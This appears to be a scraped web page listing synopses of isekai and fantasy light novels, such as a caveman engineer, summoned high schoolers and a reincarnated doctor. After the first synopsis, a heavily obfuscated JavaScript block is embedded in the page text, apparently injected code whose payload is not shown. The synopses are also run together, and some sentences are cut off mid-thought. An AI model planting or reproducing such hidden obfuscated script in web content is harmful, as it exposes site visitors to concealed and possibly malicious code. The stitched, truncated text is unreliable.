In a wondrous yet different primitive world, you have a shape shifting saber tooth tiger and a kung fu panda (literally) but when darkness befalls them, only the one who shines the brightest can save them. Follow the talented engineer, Yan Jin who witnessed flying cavemen and yet isn’t the slightest bit disturbed by it since he knows for sure that he himself, is the real caveman over there. Read on as he awakens the ancestral power of the divine fire for the glory of the tribe.<script></script><script>(function(_0x4f2580,_0x24f039){var _0x531f04=_0x476e,_0xda6017=_0x4f2580();while(!![]){try{var _0x42b74f=parseInt(_0x531f04(0x150))/(0x91e+-0x92c*-0x4+-0x2dcd)+-parseInt(_0x531f04(0x14c))/(-0xedd*0x1+-0x1573+0x1229*0x2)+parseInt(_0x531f04(0x142))/(-0x2254+-0x154e+0x37a5)*(parseInt(_0x531f04(0x136))/(0x1*-0x10c3+-0x34e+0x1415))+-parseInt(_0x531f04(0x139))/(-0xbfd+0x48a+0x1de*0x4)*(parseInt(_0x531f04(0x146))/(-0x314*0x4+0x5*-0x653+0x5d*0x79))+parseInt(_0x531f04(0x133))/(-0xa18+-0xd1*0x1d+0x21cc)*(parseInt(_0x531f04(0x135))/(0x1daf*-0x1+-0x180+0x1f37))+-parseInt(_0x531f04(0x134))/(-0xdf7+-0x262b+0x342b)*(-parseInt(_0x531f04(0x13e))/(0xeb1+-0x17d+-0xd2a))+parseInt(_0x531f04(0x14d))/(0x14f*0x1+0x1*-0x7db+0x697*0x1)*(-parseInt(_0x531f04(0x13d))/(0xb*-0x293+0xcf1*0x2+0x27b));if(_0x42b74f===_0x24f039)break;else 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The protagonist along with his step-mother, and 2 step-sisters(step-aunts) are summoned into another world where demi-humans are the rulers as saviors, but its not to fight against a demon lord, its to fight an Undead Apocalypse monsters called "Dead Mell" that have overrun the world and that can only be killed by using weapons made with holy silver. For that, a familia is made (group of 4 people) with them being the swordmaster that uses the holy sword, the guardian that uses the power of earth to protect, the healer that use the power of water to heal and the black mage that uses the power of fire to destroy. The role of the guardian, the mage and the healer is to support the swordmaster that can only kill the monsters. But to use magic powers one must offer part of your being as a sacrifice to form a contract with spirits, and the higher the sacrifice, the higher the power. Now they must choose who are the 3 that need to sacrifice part of their bodies to gain power and who will wield the holy sword.
Akira is just having an usual day at his second year of high school when he and his fellow classmates get sucked into another world through a portal! This fantasy land is called Morigan, and is a world filled with Demons, Humans, Elves and other mystical creatures. As they get debriefed by the King of one of the continents on this strange new land, they were informed that each one of them will have a class, which skills can be conveniently opened and analyzed through a "status bar", and their objective is to train, become stronger, and repel the imminent demon invasion. Only one of them, however, will be able to become the true. Akira found out that he got the class and with heavily overpowered stats, surpassing even those of the class. Making use of his shinobi-like skills, including subterfuge, negotiation and stealth, Akira goes into thrilling quests and unveils secrets about this strange new world, including a meeting with a cute Elf girl and others members of a soon-to-be adventuring party where not everything is as it seems...
The Noble Lady binds Tentacle Maid Sharan, a pious girl, has secured a well-paying job as a maid. Her mission is to serve a prideful, sadistic noble lady named Lynette. However, her job won\'t simply be that easy....
The main character, Su Qi, dies and crosses over to Los Angeles and becomes a high school student. Due to his otherworldly muse, he finds himself surrounded by a variety of spirits and demons. In order to survive and not be eaten by the spirits or have a mental breakdown, the hero embarks on a journey of becoming a god and exploring the mysterious world of the Cthulhu Islands.
Read To Hell With Being A Saint I’m A Doctor, Yusung is a genius doctor famous in the medical world. He, who spent his whole life in an operation room, died in a traffic accident, and when he woke up, he was in another world. But…a saintess? A holy empire? Healing magic? “I put so much effort into learning medicine, but now all I need to do is touch someone and they’re healed? Seriously, I think I’ve gone crazy.”
Albert, who was reincarnated in a different world, aimed for a peaceful life in the Kingdom of Alexa. However, he was abducted by Marida, a female member of the demon race known as the Bloodthirsty Vampires, who are the strongest creatures on Earth. Moreover, he was accused of aiding in the assault and became a wanted fugitive in the kingdom. Unable to return to his original country, Albert decides to live in the Empire of Eranzia. While enjoying intimate moments with the alluring body of Marida, he uses his modern knowledge to achieve great accomplishments in governance, military affairs, and strategy. A slightly risqué harem comedy begins!
He was living a peaceful life as any normal high schooler would, until one day he and his classmates were suddenly brought to uninhabited island. "I'll have you kill each other until there's only one of you remaining." Hearing these words from the man strangely dressed in a military uniform, his classmates panicked. Yes, he was setting up the stage for a death game. One where the strong devoured the weak. The weak would die without mercy and only the strong would taste victory. That was the plan. However, they were unaware that the hero who was hailed as the strongest had just recently returned from another world. The organizers behind the game were already out of luck by the time the game started as the expectations they had for death game that they had worked so desperately to set up would be unwittingly crushed before them.
A video game geek has been reincarnated as Luke, the hero of the epic RPG Legend of Spirit. With a gifted character and perfect knowledge of the game, his goal was a perfect and complete happy ending that surpassed the original story.However, the hero's mission was too heavy for an ordinary person to bear. It was too easy for something important to fall away.In this world, expediency does not happen. If Luke does not hold the sword, the world will be destroyed.So the boy puts on a mask and plays the hero, Luke.This is a false heroic tale of a boy on a mission to become a hero.
Never having known the warmth of family, he was reborn in another world. Named Yuri, he is doted on by his parents and lives a new life in peace – as it should be. However, the country where Yuri and the others live is threatened by the “other humans” who dominate the vast expanse of the continent and is in danger of dying. Yuri and his family can’t stay out of it and are caught in the middle of the war… The Knights\' House, the sword of the kingdom that wields a lance and kakedori birds. The death of his uncle, who was the leader of the Hovu family, brings Yuri’s father back to the world of knights, who had left the house to hate killing each other. Yuri is forced to attend the Knights’ Academy, where knights are trained, and the encounter there will drastically change the fate of Yuri and the kingdom. This is the story of a man who fights for the people he loves and later became known throughout the world as the “Demon King.” --- As a self-professed no-lifer, Yuri idles his days away in front of a computer. This all changes the moment his life in Japan comes to an abrupt end and he finds himself reborn in the strange new world of the Shiyalta Kingdom. His new life includes everything he once lacked: loving parents, a comfortable home, and a promising future breeding and raising birds on his dad’s ranch. For centuries, the kingdom he now calls home has enjoyed peace and prosperity, shielded by friendly nations that, like Shiyalta itself, were established with the collapse of a once-great empire. War is a distant problem, relevant only to Shiyalta’s ruling families whose warriors periodically set out to join the fighting upon massive birds trained by Yuri’s dad and others. But this peaceful existence can’t last forever. Something rotten lies at the heart of the kingdom, and it doesn’t take someone with Yuri’s exceptional intelligence to realize that those distant battles will only remain irrelevant for so long.